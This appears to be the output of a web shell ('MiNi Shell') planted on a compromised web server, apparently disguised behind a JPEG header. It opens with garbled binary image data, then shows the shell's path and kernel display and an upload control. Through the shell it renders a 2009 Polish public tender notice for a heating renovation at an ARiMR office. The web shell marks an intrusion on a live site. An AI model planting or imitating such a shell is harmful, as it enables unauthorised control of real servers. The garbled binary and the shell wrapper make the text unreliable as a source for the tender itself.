JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090813/132991-N-2009.html

<p class="kh_header"><b>Ciecierzyn: Termomodernizacja budynku Biura Powiatowego Agencji Restrukturyzacji i Modernizacji Rolnictwa w Hrubieszowie 
poprzez wykonanie kotłowni gazowej,wymianę instalacji centralnego ogrzewania
 wraz z robotami towarzyszącymi</b><br>
<b>Numer ogłoszenia: 132991 - 2009; data zamieszczenia: 13.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa Lubelski Oddział Regionalny , Elizówka 65A, 21-003 Ciecierzyn, woj. lubelskie, tel. 081 7568810, faks 081 7563941.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arimr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa osoba prawna - agencja płatnicza.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynku Biura Powiatowego Agencji Restrukturyzacji i Modernizacji Rolnictwa w Hrubieszowie 
poprzez wykonanie kotłowni gazowej,wymianę instalacji centralnego ogrzewania
 wraz z robotami towarzyszącymi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest termomodernizacja budynku Biura Powiatowego ARiMR  w Hrubieszowie przy ul. Nowej 16 (dawniej: Nowa 14) poprzez  wykonanie kotłowni gazowej oraz instalacji centralnego ogrzewania wraz z robotami towarzyszącymi. 
2.Szczegółowy zakres robót składających się na zamówienie określony został w opisie przedmiotu zamówienia, na który składają się:
A. Opis modernizacji instalacji elektrycznej (załącznik nr 4 do SIWZ).
A1. Projekt Budowlano Wykonawczy - Instalacja elektryczna kotłowni w budynku BP ARiMR w Hrubieszowie,
A1.1. Linia WLZ,
A1.2. Rzut kotłowni,
A1.3. Schemat tablicy kotłowni TK,
A1.4. Schemat podłączeń regulatora kotła,
A1.5. Schemat układu sygnalizacji awarii,
A1.6. Rozmieszczenie elementów tablicy TK,
A2.Przedmiar robót - instalacje elektryczne kotłowni w budynku BP ARiMR 
w Hrubieszowie,
A3.Specyfikacja techniczna wykonania i odbioru robót - roboty związane z montażem instalacji elektrycznych i osprzętu.

B.Opis modernizacji instalacji centralnego ogrzewania (załącznik nr 5 do SIWZ)
B1. Projekt Budowlano Wykonawczy - instalacja centralnego ogrzewania w budynku BP ARiMR w Hrubieszowie (branża sanitarna)
B1.1. Rzut parteru - instalacja C.O.,
B1.2. Rzut piętra - instalacja C.O.,
B1.3. Rozwinięcie instalacji C.O. - część I,
B1.4. Rozwinięcie instalacji C.O. - część II,
B2. Przedmiar robót - instalacja centralnego ogrzewania w budynku BP ARiMR 
w Hrubieszowie,
B3. Specyfikacja techniczna wykonania i odbioru robót budowlanych - instalacja C.O. w budynku BP ARiMR w Hrubieszowie.

C.Opis wykonania kotłowni gazowej (załącznik nr 6 do SIWZ).
C1 Projekt Budowlany - Technologia kotłowni gazowej o mocy 45 kW z instalacją gazową,
C1.1. Rzut kotłowni, Przekrój A-A,
C1.2. Aksonometria instalacji gazowej,
C1.3. Schemat technologiczny kotłowni,
C1.4. Warunki przyłączenia do sieci gazowej,
C2. Projekt budowlano wykonawczy - Kotłownia gazowa o mocy 45 kW w budynku 
BP ARiMR w Hrubieszowie,
C2.1. Rzut kotłowni,
C3. Przedmiar robót na wykonanie kotłowni gazowej w budynku BP ARiMR 
w Hrubieszowie,
C4. Specyfikacja techniczna wykonania i odbioru robót budowlanych - Kotłownia gazowa w budynku BP ARiMR (część sanitarna i budowlana).

D.Roboty remontowo malarskie dla potrzeb BP ARiMR w Hrubieszowie - roboty towarzyszące (załącznik nr 7).

3.Wykonawca uwzględni okoliczność, że roboty będą wykonywane w użytkowanym obiekcie.
4.Inne obowiązki Wykonawcy:
a)przestrzeganie przepisów p. pożarowych i BHP w trakcie wykonywania prac;
b)odpowiedzialność materialna za szkody powstałe w mieniu Zamawiającego w związku z realizacją robót modernizacyjnych;
c)zapewni objęcie kierownictwa budowy (robót) przez kierownika budowy.
5.Pozostałe istotne wymagania Zamawiającego co do przedmiotu zamówienia i realizacji umowy zostały zawarte we wzorze umowy stanowiącej załącznik nr 3 do niniejszego SIWZ.
6.Dnia 07/08/2009r. została doręczona Zamawiającemu Decyzja nr 245/09 Burmistrza Miasta Hrubieszowa w sprawie zatwierdzenia projektu budowlanego i wydania Lubelskiemu Oddziałowi Regionalnemu ARiMR pozwolenia na wykonanie kotłowni gazowej z instalacjami w budynku Biura Powiatowego ARiMR w Hrubieszowie. Z dniem 21/08/2009r. przedmiotowa decyzja stanie się prawomocna w przypadku braku odwołania..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3, 45.33.11.00-7, 45.33.30.00-0, 45.44.21.00-8, 45.41.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.W postępowaniu mogą wziąć udział Wykonawcy, którzy:
1.1.Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
1.2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
1.3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
1.4.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2.Wykluczeniu z postępowania o udzielenie zamówienia publicznego podlegają wykonawcy określeni w art. 24 Ustawy.
3.Ocena spełniania powyższych warunków zostanie przeprowadzona zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach określonych w  SIWZ. 
4.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy występujący wspólnie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Umocowanie może wynikać z treści umowy lub zostać przedłożone oddzielnie w pełnomocnictwie.
5.Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom, a także podania nazw (firm) proponowanych podwykonawców. Wykonawca odpowiada za działania podwykonawców jak za swoje własne..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Wykonawcy ubiegający się o zamówienie muszą złożyć:
1.1.Wypełniony formularz ofertowy (według załącznika Nr 1 do SIWZ). 
1.2.Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z wymaganiami art. 22 Ustawy (według załącznika Nr 2 do SIWZ). W przypadku powierzenia wykonania części lub całości zamówienia podwykonawcom, wykonawca zobowiązany jest do przedstawienia oświadczeń podwykonawców zgodnie z art. 22 ust 1 pkt. 2 Ustawy, złożonych nie później niż na dzień składania ofert.
1.3.Pełnomocnictwo (oryginał lub kopia poświadczona za zgodność z oryginałem przez wykonawcę) do podpisania oferty, jeżeli oferta nie została podpisana przez osoby upoważnione do tych czynności dokumentem rejestracyjnym.
1.4.Kosztorysy ofertowe.

Wykonawcy ubiegający się o zamówienie w celu potwierdzenia spełnienia wymaganych warunków udziału w postępowaniu, muszą załączyć do oferty niżej wymagane oświadczenia lub dokumenty:

1.5.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

UWAGA: W przypadku złożenia oferty przez spółkę z o.o., w której zaoferowana cena przewyższa dwukrotnie wysokość kapitału zakładowego w chwili zawierania umowy wymagane będzie przedłożenie uchwały jej wspólników (chyba, że umowa spółki stanowi inaczej) o zgodzie na zaciągnięcie takich zobowiązań (Kodeks Spółek Handlowych art. 230). W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna) - umowę regulującą współpracę tych podmiotów.
1.6.Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
1.7.Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 Ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.8.Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 Ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1: 
2.1- ppkt 1.5., ppkt 1.6. i ppkt 1.8. - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a)nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
c)nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne 
lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
2.2. - ppkt 1.7. - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 Ustawy.
3.Dokumenty, o których mowa w pkt 2 ppkt 2.1 lit. a) i b) oraz ppkt 2.2., powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt 2 ppkt 2.1. lit. c), powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
4.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 2, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibą lub miejsce zamieszkania. Przepis pkt 3 stosuje się odpowiednio..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa
Lubelski Oddział Regionalny
Elizówka 65A k/Lublina 21-003 Ciecierzyn
Biuro Oddziału Regionalnego - Wydział Administracyjny (budynek A, pokój 006A).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.09.2009 godzina 09:30, miejsce: Agencja Restrukturyzacji i Modernizacji Rolnictwa
Lubelski Oddział Regionalny
Elizówka 65A k/Lublina 21-003 Ciecierzyn
Kancelaria Lubelskiego OR ARiMR, budynek B, piętro I, pokój 130B.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com